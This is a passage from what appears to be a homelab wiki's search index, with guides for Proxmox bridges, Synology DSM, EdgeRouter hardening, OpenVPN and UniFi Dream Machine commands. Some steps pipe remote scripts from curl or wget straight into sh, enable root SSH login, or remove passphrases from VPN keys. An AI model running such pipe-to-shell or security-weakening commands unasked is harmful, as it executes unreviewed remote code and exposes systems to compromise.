auto lo\niface lo inet loopback\n\niface enp12s0f4 inet manual\n\nauto vmbr0\niface vmbr0 inet static\n address 192.168.100.12/24\n gateway 192.168.100.1\n bridge-ports enp12s0f4\n bridge-stp off\n bridge-fd 0\n\niface enp7s0 inet manual\n\niface enp6s0 inet manual\n\niface enp12s0f4d1 inet manual\n\niface enp12s0f4d2 inet manual\n\niface enp12s0f4d3 inet manual\n\niface wlp5s0 inet manual\n
Info
vmbr0
is a bridge interface. It's used to provision network to virtual machines and containers on Proxmox VE Server. We can assign multiple network interfaces to the bridge interface with bridge-ports
option.
", "tags": ["proxmox", "network"]}, {"location": "infrastructure/proxmox/network/proxmox-networking/#static-ip-bridge-configuration", "title": "Static IP Bridge Configuration", "text": "The following example shows a static IP configuration vmbr0
bridge interface, including two network interfaces enp12s0f4
and enp7s0
.
auto vmbr0\niface vmbr0 inet static\n address 192.168.100.12/24\n gateway 192.168.100.1\n bridge-ports enp12s0f4 enp7s0\n bridge-stp off\n bridge-fd 0\n
Configuring multi network interfaces to the bridge interface will provide you a failover behavior when the network interface is down or disconnected - for example, when specific switch is down.
", "tags": ["proxmox", "network"]}, {"location": "infrastructure/proxmox/network/proxmox-networking/#static-ip-bridge-with-vlan-aware-configuration", "title": "Static IP Bridge with VLAN Aware Configuration", "text": "The following example shows a static IP as above but with VLAN Aware bridge.
auto vmbr0\niface vmbr0 inet static\n address 192.168.100.12/24\n gateway 192.168.100.1\n bridge-ports enp12s0f4 enp7s0\n bridge-stp off\n bridge-fd 0\n bridge-vlan-aware yes\n bridge-vids 2-4094\n
", "tags": ["proxmox", "network"]}, {"location": "infrastructure/proxmox/network/proxmox-networking/#dhcp-bridge-configuration", "title": "DHCP Bridge Configuration", "text": "The following example shows a DHCP configuration vmbr0
bridge interface, including two network interfaces enp12s0f4
and enp7s0
.
auto vmbr0\niface vmbr0 inet dhcp\n bridge-ports enp12s0f4 enp7s0\n bridge-stp off\n bridge-fd 0\n
", "tags": ["proxmox", "network"]}, {"location": "infrastructure/proxmox/network/proxmox-networking/#dhcp-bridge-with-vlan-aware-configuration", "title": "DHCP Bridge with VLAN Aware Configuration", "text": "The following example shows a DHCP as above but with VLAN Aware bridge.
auto vmbr0\niface vmbr0 inet dhcp\n bridge-ports enp12s0f4 enp7s0\n bridge-stp off\n bridge-fd 0\n bridge-vlan-aware yes\n bridge-vids 2-4094\n
", "tags": ["proxmox", "network"]}, {"location": "infrastructure/proxmox/network/proxmox-networking/#personal-network-configuration", "title": "Personal Network Configuration", "text": "Here's a sample of the /etc/network/interfaces
file for a personal network:
auto lo\niface lo inet loopback\n\nauto vmbr0\niface vmbr0 inet dhcp\n bridge-ports enp12s0f4 enp12s0f4d1 enp12s0f4d2 enp12s0f4d3 enp7s0\n bridge-stp off\n bridge-fd 0\nbridge-vlan-aware yes\n bridge-vids 2-4094\n\niface enp12s0f4 inet manual\n\niface enp12s0f4d1 inet manual\n\niface enp12s0f4d2 inet manual\n\niface enp12s0f4d3 inet manual\n\niface enp7s0 inet manual\n\niface enp6s0 inet manual\n\niface wlp5s0 inet manual\n
", "tags": ["proxmox", "network"]}, {"location": "infrastructure/synology/Install-oh-my-zsh/", "title": "How to install oh-my-zsh on Synology NAS", "text": "", "tags": ["synology", "oh-my-zsh"]}, {"location": "infrastructure/synology/Install-oh-my-zsh/#introduction", "title": "Introduction", "text": "The following steps will instruct you how to install oh-my-zsh on Synology DSM NAS.
", "tags": ["synology", "oh-my-zsh"]}, {"location": "infrastructure/synology/Install-oh-my-zsh/#whats-zsh", "title": "Whats' ZSH", "text": "Z-shell (Zsh) is a Unix shell that can be used as an interactive login shell and as a shell scripting command interpreter. Zsh is an enhanced Bourne shell with many enhancements, including some Bash, ksh and tcsh features.
", "tags": ["synology", "oh-my-zsh"]}, {"location": "infrastructure/synology/Install-oh-my-zsh/#whats-oh-my-zsh", "title": "What's Oh-My-Zsh", "text": "Oh My Zsh is an open source, community-driven framework for managing your zsh configuration.
", "tags": ["synology", "oh-my-zsh"]}, {"location": "infrastructure/synology/Install-oh-my-zsh/#community-packages-for-synology-dsm", "title": "Community Packages for Synology DSM", "text": "In order to install oh-my-zsh, we need to add 3rd party packages to Synology DSM. Synology Community Packages provides packages for Synology-branded NAS devices.
DSM 6 and below:
Log into your NAS as administrator and go to Main Menu \u2192 Package Center \u2192 Settings and set Trust Level to Synology Inc. and trusted publishers.
In the Package Sources tab, click Add, type SynoCommunity as Name and https://packages.synocommunity.com/
as Location and then press OK to validate.
Go back to the Package Center and enjoy SynoCommunity's packages in the Community tab.
", "tags": ["synology", "oh-my-zsh"]}, {"location": "infrastructure/synology/Install-oh-my-zsh/#install-z-shell-with-modules", "title": "Install Z shell (with modules)
", "text": "Install Z shell (with modules)
from package center Community tab.
", "tags": ["synology", "oh-my-zsh"]}, {"location": "infrastructure/synology/Install-oh-my-zsh/#install-git", "title": "Install Git
", "text": "Install Git
from package center Community tab.
", "tags": ["synology", "oh-my-zsh"]}, {"location": "infrastructure/synology/Install-oh-my-zsh/#change-the-default-shell-to-zsh", "title": "Change The Default Shell to ZSH
", "text": "The following steps will be performed via SSH
edit ~/.profile
the file may be missing, so create it if it doesn't exist.
vi ~/.profile\n
Append the codes below to the end of the file or add if empty.
if [[ -x /usr/local/bin/zsh ]]; then\nexport SHELL=/usr/local/bin/zsh\n exec /usr/local/bin/zsh\nfi\n
Open new SSH session to Synology NAS the shell should be zsh
", "tags": ["synology", "oh-my-zsh"]}, {"location": "infrastructure/synology/Install-oh-my-zsh/#install-oh-my-zsh", "title": "Install Oh My Zsh", "text": "From new SSH session with zsh
shell, install Oh My Zsh with the one of following command:
with curl:
sh -c \"$(curl -fsSL https://raw.githubusercontent.com/ohmyzsh/ohmyzsh/master/tools/install.sh)\"\n
with wget:
sh -c \"$(wget -O- https://raw.githubusercontent.com/ohmyzsh/ohmyzsh/master/tools/install.sh)\"\n
At this point you should have a working oh-my-zsh
working on your Synology NAS.
", "tags": ["synology", "oh-my-zsh"]}, {"location": "infrastructure/synology/Installing-vm-tools-on-virtual-machine/", "title": "Install VM Tools on Virtual Machine", "text": "On Debian:
sudo add-apt-repository universe\nsudo apt-get install qemu-guest-agent\n
On CentOS 7:
yum install -y qemu-guest-agent\n
On CentOS 8:
dnf install -y qemu-guest-agent\n
", "tags": ["synology"]}, {"location": "infrastructure/synology/auto-dsm-config-backup/", "title": "Auto DSM Config Backup", "text": "Since synology's dms doesn't provide any auto-backup for it's configuration i've made a smile script that can be run at from the \"Task Scheduler\". The script invokes synoconfbkp cli command that will dump the config file to provided folder. I use dropbox's folder in my case (This will sync my files to DropBox account). It append a date and hostname. It also checks the same folder for files older of 60 days and deletes them so your storage won't be flooded with files from older than 2 month. I've scheduled the script to run ounces a day with the \"Task Scheduler\"
To use it create new Task Scheduler choose a scheduler append the script to \"Run Command\" at \"Task Settings\" don't forget to change to destinations.
synoconfbkp export --filepath=/volume1/activeShare/Dropbox/SettingsConfigs/synologyConfigBackup/$(hostname)_$(date +%y%m%d).dss && find /volume1/activeShare/Dropbox/SettingsConfigs/synologyConfigBackup -type f -mtime +60 -exec rm -f {} \\;\n
", "tags": ["synology"]}, {"location": "infrastructure/synology/disable-dms-listening-on-80-443-ports/", "title": "Free 80,443 Ports On Synology NAS (DSM)", "text": "Synology NAS (DSM) is a network storage device, with some additional features like native support for virtualization, and docker support. One of the issues is that the default ports 80 and 443 are used by the web server even if you change the default ports of the Synology's DSM to other ports. In some cases, you want to use these ports for other purposes, such as a reverse proxy as an entry point for the web services. The following steps will help you to free the default ports 80 and 443 on the Synology NAS (DSM) for other purposes.
", "tags": ["synology", "NAS", "ports"]}, {"location": "infrastructure/synology/disable-dms-listening-on-80-443-ports/#configure-the-synology-nas-dsm-to-listen-on-other-ports", "title": "Configure the Synology NAS (DSM) to Listen on Other Ports", "text": "First, you need to configure the Synology NAS (DSM) to listen on other ports then 80, 443.
Login to the Synology NAS (DSM) as administrator user open Control Panel
and find Login Portal
under System
Under DSM
tab, change the DSM port (http) to a different port then 80, and the DSM port (https) to a different port then 443.
Click Save
to save the changes. Then, re-login to the Synology NAS (DSM) with the new port as administrator user as we did above.
", "tags": ["synology", "NAS", "ports"]}, {"location": "infrastructure/synology/disable-dms-listening-on-80-443-ports/#disable-the-synology-nas-dsm-to-listen-on-80-443-ports", "title": "Disable the Synology NAS (DSM) to Listen on 80, 443 Ports", "text": "Synology NAS (DSM) will listen on 80, 443 ports after each reboot. Therefore, the changes will be lost after each reboot. The workaround is to run the a script to free the ports 80, 443 on each time the Synology NAS (DSM) is boots.
The following one liner will free the ports 80, 443 on Nginx web server of the Synology NAS (DSM), until the Synology NAS (DSM) is rebooted. It removes the port 80, 443 from the Nginx
config and restarts the Nginx
service.
DSM 7.x.xDSM 6.x.x sed -i -e 's/80/81/' -e 's/443/444/' /usr/syno/share/nginx/server.mustache /usr/syno/share/nginx/DSM.mustache /usr/syno/share/nginx/WWWService.mustache\n\nsynosystemctl restart nginx\n
sed -i -e 's/80/81/' -e 's/443/444/' /usr/syno/share/nginx/server.mustache /usr/syno/share/nginx/DSM.mustache /usr/syno/share/nginx/WWWService.mustache\n\nsynoservicecfg --restart nginx\n
In order to persist the changes, we will create a Scheduled Task
to run the above script on each reboot.
Head to Control Panel
and find Task Scheduler
, then click Create
and select Triggerd Task
- User-defined script
.
At Create Task
- General
page, fill in the following information:
Task: Disable_DSM_Listening_on_80_443 User: root Event: Boot-up Pre-taks: None Enabled: Yes
At Task Settings
tab, under Run command
fill the User-defined script
with the following depending on Synology NAS (DSM) version:
DSM 7.x.xDSM 6.x.x sed -i -e 's/80/81/' -e 's/443/444/' /usr/syno/share/nginx/server.mustache /usr/syno/share/nginx/DSM.mustache /usr/syno/share/nginx/WWWService.mustache\n\nsynosystemctl restart nginx\n
sed -i -e 's/80/81/' -e 's/443/444/' /usr/syno/share/nginx/server.mustache /usr/syno/share/nginx/DSM.mustache /usr/syno/share/nginx/WWWService.mustache\n\nsynoservicecfg --restart nginx\n
Suggestion: Select the Notification when the task is terminated abnormally.
Click OK
. The new task should be created. You can check the task by clicking Run
in the Task Scheduler
page. Preferred to reboot the Synology NAS (DSM) to make sure the changes are applied at boot.
", "tags": ["synology", "NAS", "ports"]}, {"location": "infrastructure/synology/enable-ssh-root-login/", "title": "Enable Synology SSH Root Login", "text": "Synology DSM allows Linux experts to use the SSH terminal. By default you need to log in as a user and then enter \"sudo su root\" can be inconvenient, but there is the option of logging in as root directly.
", "tags": ["synology", "ssh"]}, {"location": "infrastructure/synology/enable-ssh-root-login/#section", "title": "Section", "text": "First, the DSM Control Panel is called up, Extended mode must be activated so that the required icon Terminal & SNMP appears. Under Terminal & SNMP the SSH-Service just can enable.
Connect to Synology dns with your admin user and password. Change user to root with the command \"sudo su\" and enter the Admins's password. Set the root
user password with the command below:
sudo synouser -setpw root 'new_root_password'\n
Edit the file /etc/ssh/sshd_config
and change the line PermitRootLogin no
to PermitRootLogin yes
.
sudo vi /etc/ssh/sshd_config\n
Reboot the Synology NAS to apply the changes.
", "tags": ["synology", "ssh"]}, {"location": "infrastructure/synology/ssh-with-rsa-key/", "title": "Synology DSM - Allow Presistent SSH With RSA Keys", "text": "As a power user, i would like to be able to connect to my Synology DSM vis SSH. The issue is that Synology DSM won't allow you to use SSH with RSA keys out of the box and only allows you to use SSH with password. In order to allow the use of SSH keys we need to perform the following steps:
", "tags": ["synology", "dsm", "ssh", "rsa-keys"]}, {"location": "infrastructure/synology/ssh-with-rsa-key/#requirements", "title": "Requirements", "text": "I will assume you have already have SSH keys generated, SSH server configured on Synology DSM
Generated SSH keys SSH server configured on Synology DSM ", "tags": ["synology", "dsm", "ssh", "rsa-keys"]}, {"location": "infrastructure/synology/ssh-with-rsa-key/#allow-user-home-at-dsm-level", "title": "Allow User Home
at DSM Level", "text": "User Home
enable to create a personal home folder for each user, except for guest. This will allow as to create user's .ssh
folder and authorized_keys
file.
Log into Synology web UI as an administrator user Control Panel -> User & Groups -> Advanced, scroll down to \u201cUser Home\u201d Check \u201cEnable user home service\u201d, select an appropriate Location (i.e. volume1) Click \u201cApply\u201d
", "tags": ["synology", "dsm", "ssh", "rsa-keys"]}, {"location": "infrastructure/synology/ssh-with-rsa-key/#configure-ssh-folder-and-authorized_keys-file", "title": "Configure .ssh
Folder and authorized_keys
File", "text": "Log in to the NAS through SSH with the user you want to add key authorization for. The following example shows how to add will work for the active user in the SSH session.
First change the permissins of the users home
folder to 700
sudo chmod 700 ~\n
Create the .ssh
folder and set permissions to 700
mkdir ~/.ssh && chmod 700 ~/.ssh\n
Create the authorized_keys
file and set permissions to 644
touch ~/.ssh/authorized_keys && chmod 644 ~/.ssh/authorized_keys\n
Synology's DSM SSH server supports RSA and ed25519 keys.
No you need to copy you public keys to authorized_keys
file, you can do it manually or use the following command:
echo <public-key-sting> >> ~/.ssh/authorized_keys\n
You can do it automatically by using the following command from a client with the ssh key you want to add:
ssh-copy-id -i ~/.ssh/id_rsa <user@ip-address>\n
At this point you should be able to connect to Synology DSM via SSH using the key you just added.
", "tags": ["synology", "dsm", "ssh", "rsa-keys"]}, {"location": "infrastructure/ubiquiti/edge-router/", "title": "EdgeRouter", "text": "", "tags": ["ubiquiti", "edgerouter"]}, {"location": "infrastructure/ubiquiti/edge-router/#clear-dns-forwarding-cache-via-ssh-call", "title": "Clear DNS Forwarding Cache via SSH Call", "text": "ssh user@192.168.1.1 'sudo /opt/vyatta/bin/sudo-users/vyatta-op-dns-forwarding.pl --clear-cache'\n
", "tags": ["ubiquiti", "edgerouter"]}, {"location": "infrastructure/ubiquiti/edge-router/#ssh-via-rsa-keys", "title": "SSH via RSA keys", "text": "SSH to the Edge Router: Copy the public key to /tmp folder
Run:
configure\nloadkey [your user] /tmp/id_rsa.pub\n
Check that the keys are working by opening new session
Disable Password Authentication
set service ssh disable-password-authentication\ncommit ; save\n
Done.
Enable Password Authentication if needed.
delete service ssh disable-password-authentication\n
", "tags": ["ubiquiti", "edgerouter"]}, {"location": "infrastructure/ubiquiti/edge-router/#hardening-edgerouter", "title": "Hardening EdgeRouter", "text": "This will change the GUI to port 8443, disable old cyphers, Only will listen on internal Network. assuming your EdgeRouter IP is 192.168.1.1, if not change it accordingly.
SSH to the Edge Router
configure\nset service gui listen-address 192.168.100.1\nset service gui https-port 8443\nset service gui older-ciphers disable\nset service ssh listen-address 192.168.100.1\nset service ssh protocol-version v2\nset service ubnt-discover disable\ncommit ; save\n
", "tags": ["ubiquiti", "edgerouter"]}, {"location": "infrastructure/ubiquiti/edge-router/#hardware-offloading", "title": "Hardware Offloading", "text": "For Devices: ER-X / ER-X-SFP / EP-R6 Enable hwnat and ipsec offloading.
configure\n\nset system offload hwnat enable\nset system offload ipsec enable\n\ncommit ; save\n
Disable hwnat and ipsec offloading.
configure\n\nset system offload hwnat disable\nset system offload ipsec disable\n\ncommit ; save\n
For Devices: ER-4 / ER-6P / ERLite-3 / ERPoE-5 / ER-8 / ERPro-8 / EP-R8 / ER-8-XG Enable IPv4/IPv6 and ipsec offloading.
configure\n\nset system offload ipv4 forwarding enable\nset system offload ipv4 gre enable\nset system offload ipv4 pppoe enable\nset system offload ipv4 vlan enable\n\nset system offload ipv6 forwarding enable\nset system offload ipv6 pppoe enable\nset system offload ipv6 vlan enable\n\nset system offload ipsec enable\n\ncommit ; save\n
Disable IPv4/IPv6 and ipsec offloading.
configure\n\nset system offload ipv4 forwarding disable\nset system offload ipv4 gre disable\nset system offload ipv4 pppoe disable\nset system offload ipv4 vlan disable\n\nset system offload ipv6 forwarding disable\nset system offload ipv6 pppoe disable\nset system offload ipv6 vlan disable\n\nset system offload ipsec disable\n\ncommit ; save\n
", "tags": ["ubiquiti", "edgerouter"]}, {"location": "infrastructure/ubiquiti/edge-router/#disable-update-etchosts-file-on-edgerouter", "title": "Disable, Update /etc/hosts file on EdgeRouter", "text": "Disable Auto DHCP hots:
configure\nset service dhcp-server hostfile-update disablecommit\ncommit ; save\n
Update the Host File Manually:
configure\nset system static-host-mapping host-name mydomain.com inet 192.168.1.10\ncommit ; save\n
Show DNS Forwarding
configure\nshow service dns forwarding\n
Show Hosts Config
cat /etc/hosts\n
", "tags": ["ubiquiti", "edgerouter"]}, {"location": "infrastructure/ubiquiti/edge-router/#guest-wifi-with-ubiquiti-edgerouter-and-unifi-access-points", "title": "Guest Wifi With Ubiquiti EdgeRouter and Unifi Access Points", "text": "", "tags": ["ubiquiti", "edgerouter"]}, {"location": "infrastructure/ubiquiti/edge-router/#edgerouter-configuration", "title": "EdgeRouter Configuration", "text": "From the Dashboard, click Add Interface and select VLAN.
Set up the VLAN ID as You like for this example will use id 1003 and attach it to the physical interface of your LAN. Give it an IP address in the range of a private IP block, but make sure you end it in a /24 to specify the proper subnet (I originally did /32 as I though it was supposed to be the exact IP address).
Click on the Services tab. Click Add DHCP Server. Set it up similar to the image below.
Click on the DNS tab under services. Click Add Listen interface and select the VLAN interface. Make sure you hit save.
At this point, you should be able to connect to your Guest Network and connect to the Internet. However, you\u2019ll be able to access the EdgeRouter as well as other devices on your LAN. Next thing you have to do is secure the VLAN.
Click on Firewall/NAT and then click on Add Ruleset. This is for packets coming into the router destined for somewhere else (not the router). Set up the default policy for Accept. Click Save.
From the Actions menu next to the Ruleset, click Interfaces.
Select your VLAN interface and the in direction.
Click Rules and then Add New Rule. Click on Basic and name it LAN. Select Drop as the Action.
Click Destination and enter 10.0.1.0/24 or whatever your LAN IP range is. Then click Save. This will drop all packets from the VLAN destined for your LAN. Save.
Repeat 1 and 2 above (name it GUEST_LOCAL). From the Interface, select the VLAN interface and the local direction. However, set up the default policy as Drop.
Add a new rule. Set it to Accept on UDP port 53.
Save. Let's continue to set up the Uifi AP
", "tags": ["ubiquiti", "edgerouter"]}, {"location": "infrastructure/ubiquiti/edge-router/#unifi-configuration", "title": "Unifi Configuration", "text": "If you want to limit your Guest Users Bandwidth, head over to User Groups and create a new user group called Guest. Enter bandwidth limits that are appropriate for your Internet Speed. I used 6000 down and 2500 up.
Now go to the Wireless Networks section and create a new network called \u201cGuest\u201d or whatever you want to call it.
Make sure it is enabled, give it WiFi security key, check the \u201cGuest Policy\u201d option, enter the VLAN Id you used previously and choose the Guest User Group. Save!
Done. Test Your New Guest Wifi by connecting to the Guest Wifi and browse to a website.
", "tags": ["ubiquiti", "edgerouter"]}, {"location": "infrastructure/ubiquiti/edge-router/#edgerouter-openvpn-configuration-443tcp", "title": "EdgeRouter OpenVPN Configuration 443/TCP", "text": "This Guide is based on Original guide form ubnt support with modifications to the VPN port and protocol
For the purpose of this article, it is assumed that the routing and interface configurations are already in place and that reachability has been tested.
ssh to the EdgeRouter
Make sure that the date/time is set correctly on the EdgeRouter.
show date\nThu Dec 28 14:35:42 UTC 2017\n
Log in as the root user.
sudo su\n
Generate a Diffie-Hellman (DH) key file and place it in the /config/auth directory. This Will take some time...
openssl dhparam -out /config/auth/dh.pem -2 4096\n
Change the current directory.
cd /usr/lib/ssl/misc\n
Generate a root certificate (replace with your desired passphrase).
./CA.pl -newca\n
exmaple:
PEM Passphrase: Country Name: US
State Or Province Name: New York
Locality Name: New York
Organization Name: Ubiquiti
Organizational Unit Name: Support
Common Name: root
Email Address: support@ubnt.com
NOTE: The Common Name needs to be unique for all certificates.
Copy the newly created certificate + key to the /config/auth directory.
cp demoCA/cacert.pem /config/auth\ncp demoCA/private/cakey.pem /config/auth\n
Generate the server certificate.
./CA.pl -newreq\n
exmaple:
Country Name: US
State Or Province Name: New York
Locality Name: New York
Organization Name: Ubiquiti
Organizational Unit Name: Support
Common Name: server
Email Address: support@ubnt.com
Sign the server certificate.
if you want to change the certificate expiration day use: export default_days=\"3650\" with the value of days you desire
./CA.pl -sign\n
Move and rename the server certificate + key to the /config/auth directory.
mv newcert.pem /config/auth/server.pem\nmv newkey.pem /config/auth/server.key\n
Generate, sign and move the client1 certificates.
./CA.pl -newreq\n
Common Name: client1
./CA.pl -sign\nmv newcert.pem /config/auth/client1.pem\nmv newkey.pem /config/auth/client1.key\n
(Optional) Repeat the process for client2.
./CA.pl -newreq\n
Common Name: client2
./CA.pl -sign\nmv newcert.pem /config/auth/client2.pem\nmv newkey.pem /config/auth/client2.key\n
Verify the contents of the /config/auth directory.
ls -l /config/auth\n
You should have those files:
cacert.pem cakey.pem client1.key client1.pem client2.key client2.pem dh.pem server.key server.pem Remove the password from the client + server keys. This allows the clients to connect using only the provided certificate.
openssl rsa -in /config/auth/server.key -out /config/auth/server-no-pass.key\nopenssl rsa -in /config/auth/client1.key -out /config/auth/client1-no-pass.key\nopenssl rsa -in /config/auth/client2.key -out /config/auth/client2-no-pass.key\n
Overwrite the existing keys with the no-pass versions.
mv /config/auth/server-no-pass.key /config/auth/server.key\nmv /config/auth/client1-no-pass.key /config/auth/client1.key\nmv /config/auth/client2-no-pass.key /config/auth/client2.key\n
Return to operational mode.
exit\n
Enter configuration mode.
configure\n
If EdgeRouter's Interface is on port 433, you must change it.
set service gui https-port 8443\ncommit ; save\n
Add a firewall rule for the OpenVPN traffic to the local firewall policy.
set firewall name WAN_LOCAL rule 30 action accept\nset firewall name WAN_LOCAL rule 30 description OpenVPN\nset firewall name WAN_LOCAL rule 30 destination port 443\nset firewall name WAN_LOCAL rule 30 protocol tcp\n
Configure the OpenVPN virtual tunnel interface. push-route - the router for vpn connection name-server - default gateway of the route above
set interfaces openvpn vtun0 mode server\nset interfaces openvpn vtun0 server subnet 172.16.1.0/24\nset interfaces openvpn vtun0 server push-route 192.168.100.0/24\nset interfaces openvpn vtun0 server name-server 192.168.100.1\nset interfaces openvpn vtun0 openvpn-option --duplicate-cn\nset interfaces openvpn vtun0 local-port 443\nedit interfaces openvpn vtun0\nset openvpn-option \"--push redirect-gateway\"\nset protocol tcp-passive\ncommit ; save\n
Link the server certificate/keys and DH key to the virtual tunnel interface.
set interfaces openvpn vtun0 tls ca-cert-file /config/auth/cacert.pem\nset interfaces openvpn vtun0 tls cert-file /config/auth/server.pem\nset interfaces openvpn vtun0 tls key-file /config/auth/server.key\nset interfaces openvpn vtun0 tls dh-file /config/auth/dh.pem\ncommit ; save\n
Add DNS forwarding to the new vlan vtun0 to get DNS resolving.
", "tags": ["ubiquiti", "edgerouter"]}, {"location": "infrastructure/ubiquiti/edge-router/#exmaple-for-clinetopvn-config", "title": "Exmaple for clinet.opvn Config", "text": "client\ndev tun\nproto udp\nremote <server-ip or hostname> 443\nfloat\nresolv-retry infinite\nnobind\npersist-key\npersist-tun\nverb 3\nca cacert.pem\ncert client1.pem\nkey client1.key\n
", "tags": ["ubiquiti", "edgerouter"]}, {"location": "infrastructure/ubiquiti/edge-router/#edgerouter-free-up-space-by-cleaning-old-firmware", "title": "EdgeRouter Free Up space by Cleaning Old Firmware", "text": "ssh to the EdgeRouter:
delete system image\n
", "tags": ["ubiquiti", "edgerouter"]}, {"location": "infrastructure/ubiquiti/edge-router/#speedtest-cli-on-edge-router", "title": "SpeedTest Cli on Edge Router", "text": "ssh to the Edge Router. installation:
curl -Lo speedtest-cli https://raw.githubusercontent.com/sivel/speedtest-cli/master/speedtest.py\nchmod +x speedtest-cli\n
run from the same directory:
./speedtest-cli --no-pre-allocate\n
based on https://github.com/sivel/speedtest-cli
", "tags": ["ubiquiti", "edgerouter"]}, {"location": "infrastructure/ubiquiti/edge-router/#enable-netflow-on-edgerouter-to-unms", "title": "Enable NetFlow on EdgeRouter to UNMS", "text": "The most suitable place to enable NetFlow is your Default gateway router. UNMS supports NetFlow version 5 and 9. UNMS only record flow data for IP ranges defined below. Whenever UNMS receives any data from a router, the status of NetFlow changes to Active
.
To show interfaces and pick the right interface:\\
show interfaces\n
Example configuration for EdgeRouter:
configure\nset system flow-accounting interface pppoe0\nset system flow-accounting ingress-capture post-dnat\nset system flow-accounting disable-memory-table\nset system flow-accounting netflow server 192.168.1.10 port 2055\nset system flow-accounting netflow version 9\nset system flow-accounting netflow engine-id 0\nset system flow-accounting netflow enable-egress engine-id 1\nset system flow-accounting netflow timeout expiry-interval 60\nset system flow-accounting netflow timeout flow-generic 60\nset system flow-accounting netflow timeout icmp 60\nset system flow-accounting netflow timeout max-active-life 60\nset system flow-accounting netflow timeout tcp-fin 10\nset system flow-accounting netflow timeout tcp-generic 60\nset system flow-accounting netflow timeout tcp-rst 10\nset system flow-accounting netflow timeout udp 60\ncommit\nsave\n
10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16, 100.64.0.0/10
", "tags": ["ubiquiti", "edgerouter"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/cli-commands/", "title": "UDM CLI Commands List", "text": "Collection of CLI commands for the Ubiquiti Unifi Dream Machine or Dream Machine Pro.
", "tags": ["udm", "ubiquiti", "unifi"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/cli-commands/#common-udm-commands", "title": "Common UDM Commands", "text": "Open shell to unifi podman container (udm pro)
unifi-os shell\n
Show Sensors information including: UDM temperature, fan speed, and voltage.
sensors\n
Show ARP Table
arp -a\n
Display All Listening Ports on the UDM Device
netstat -plant\n
", "tags": ["udm", "ubiquiti", "unifi"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/cli-commands/#udm-commands-list", "title": "UDM Commands List", "text": "Collection of commands for your Unifi Dream Machine or Dream Machine Pro.
Description UDM/UDM-P SSH Command show DHCP leases (to NSname) cat /mnt/data/udapi-config/dnsmasq.lease show version info show system hardware and installed software ubnt-device-info summary show cpu tempeture ubnt-systool cputemp show fan speed ubnt-fan-speed show uptime uptime show ip route netstat -rt -n show ppp summery pppstats show current user whoami show log cat /var/log/messages show interface summary ifstat show interfaces ifconfig show other Ubiquiti devices on local LAN segment (ubnt-discovery) ubnt-tools ubnt-discover show config (wireless) cat /mnt/data/udapi-config/unifi packet capture tcpdump shutdown poweroff reload reboot show ipsec sa ipsec statusall factory reset factory-reset.sh show system burnt in MAC address ubnt-tools hwaddr show unifi server logs cat /mnt/data/unifi-os/unifi/logs/server.log show unifi server setttings cat /mnt/data/unifi-os/unifi-core/config/settings.yaml show unifi server http logs cat /mnt/data/unifi-os/unifi-core/logs/http.log show unifi server http logs (errors) cat /mnt/data/unifi-os/unifi-core/logs/errors.log show unifi server discovery log cat /mnt/data/unifi-os/unifi-core/logs/discovery.log show unifi system logs cat /mnt/data/unifi-os/unifi-core/logs/system.log Restarts the UnifiOS Web interface /etc/init.d/S95unifios restart show ip arp (show arp) and IPv6 neighbours arp -a OR ip neigh show tunnel interfaces ip tunnel show Show Sensors information sensors Open shell to unifi podman container unifi-os shell tcpdump tcpdump -w", "tags": ["udm", "ubiquiti", "unifi"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/failover-telegram-notifications/", "title": "UDM WAN Failover Telegram Notifications", "text": "This script will send a message to a Telegram chat when WAN connection is changed to failover and back to normal.
Github Repository: UDM Failover Telegram Notifications
", "tags": ["udm", "ubiquiti", "unifi"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/failover-telegram-notifications/#changelog", "title": "Changelog", "text": " 2023-02-22 - Added support for multiple UDM versions 1.x, 2.x and 3.x ", "tags": ["udm", "ubiquiti", "unifi"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/failover-telegram-notifications/#persistence-on-reboot", "title": "Persistence on Reboot", "text": "This script need to run every time the system is rebooted since the UDM overwrites crons every boot. This can be accomplished with a boot script. Flow this guide: UDM / UDMPro Boot Script
", "tags": ["udm", "ubiquiti", "unifi"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/failover-telegram-notifications/#compatibility", "title": "Compatibility", "text": "", "tags": ["udm", "ubiquiti", "unifi"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/failover-telegram-notifications/#installation", "title": "Installation", "text": "curl -s https://raw.githubusercontent.com/fire1ce/UDM-Failover-Telegram-Notifications/main/install.sh | sh\n
Set your Telegram Chat ID and Bot API Key at
$DATA_DIR for 1.x = /mnt/data $DATA_DIR for 2.x and 3.x = /data
$DATA_DIR/UDMP-Failover-Telegram-Notifications/failover-notifications.sh\n
", "tags": ["udm", "ubiquiti", "unifi"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/failover-telegram-notifications/#config", "title": "Config", "text": "Parameters Description telegram_bot_API_Token Telegram Bot API Token telegram_chat_id Chat ID of the Telegram Bot echo_server_ip IP of a server to test what interface is active (Default 1.1.1.1) run_interval Interval to run a failover check (Default 60 seconds)", "tags": ["udm", "ubiquiti", "unifi"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/failover-telegram-notifications/#uninstall", "title": "Uninstall", "text": "Delete the UDMP-Failover-Telegram-Notifications folder
rm -rf $DATA_DIR/UDMP-Failover-Telegram-Notifications\n
Delete on boot script file
rm -rf $DATA_DIR/on_boot.d/99-failover-telegram-notifications.sh\n
", "tags": ["udm", "ubiquiti", "unifi"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/failover-telegram-notifications/#usage", "title": "Usage", "text": "At boot the script with create a cronjob that will run once. This is done to prevent boot blocking.
Manual run to test notifications:
$DATA_DIR/UDMP-Failover-Telegram-Notifications/failover-notifications.sh\n
It's strongly recommended to perform a reboot in order to check the on boot initialization of the notifications
", "tags": ["udm", "ubiquiti", "unifi"]}, {"location": "infrastructure/ubiquiti/udm-dream-machine/persistent-boot-script/", "title": "Persistent On Boot Script", "text": "When UDM or UDM PRO reboots or the firmawre is updated the custom changes you made will be lost. This Script will allow you to initialize your custom changes on every boot or firmware update. without losing your custom changes.
Github Repository: unifios-utilities - on-boot-script
